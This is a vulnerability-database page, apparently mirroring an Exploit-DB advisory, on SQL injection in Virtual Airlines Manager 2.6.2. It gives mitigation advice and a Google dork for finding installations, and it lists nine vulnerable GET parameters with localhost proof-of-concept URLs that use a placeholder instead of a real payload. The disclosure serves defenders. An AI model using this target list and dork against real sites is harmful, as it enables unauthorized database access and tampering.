Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection

vendor:

Virtual Airlines Manager

by:

Milad Karimi

5.5

CVSS

MEDIUM

SQL Injection

CWE

Product Name: Virtual Airlines Manager

Affected Version From: 2.6.2002

Affected Version To: 2.6.2002

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu 19.04

2021

Virtual Airlines Manager 2.6.2 – ‘multiple’ SQL Injection

The Virtual Airlines Manager version 2.6.2 is vulnerable to multiple SQL Injection attacks. The vulnerability exists in various GET parameters, including notam_id, airport, registry_id, plane_location, hub_id, pilot_id, event_id, and tour_id. An attacker can exploit these parameters to inject malicious SQL queries, potentially leading to unauthorized access, data manipulation, or data disclosure.

Mitigation:

To mitigate the risk associated with these SQL Injection vulnerabilities, it is recommended to implement proper input validation and parameterized queries to prevent unauthorized SQL code execution. Regular security updates and patching should also be applied to the Virtual Airlines Manager software.

Source

Exploit-DB raw data:

# Exploit Title: Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection
# Google Dork: Powered by Virtual Airlines Manager [v2.6.2]
# Date: 2021-12-30
# Exploit Author: Milad Karimi
# Vendor Homepage: http://virtualairlinesmanager.net
# Software Link: https://virtualairlinesmanager.net/index.php/vam-releases/
# Version: 2.6.2
# Tested on: Ubuntu 19.04

[1] Vulnerable GET parameter: notam_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=notam&notam_id=[SQLi]

[2] Vulnerable GET parameter: airport=[SQLi]
[PoC] http://localhost/vam/index.php?page=airport_info&airport=[SQLi]

[3] Vulnerable GET parameter: registry_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi]

[4] Vulnerable GET parameter: plane_location=[SQLi]
[PoC] http://localhost/vam/index.php?page=fleet_public&plane_location=[SQLi]

[5] Vulnerable GET parameter: hub_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=hub&hub_id=[SQLi]

[6] Vulnerable GET parameter: pilot_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=pilot_details&pilot_id=[SQLi]

[7] Vulnerable GET parameter: registry_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi]

[8] Vulnerable GET parameter: event_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=event&event_id=[SQLi]

[9] Vulnerable GET parameter: tour_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=tour_detail&tour_id=[SQLi]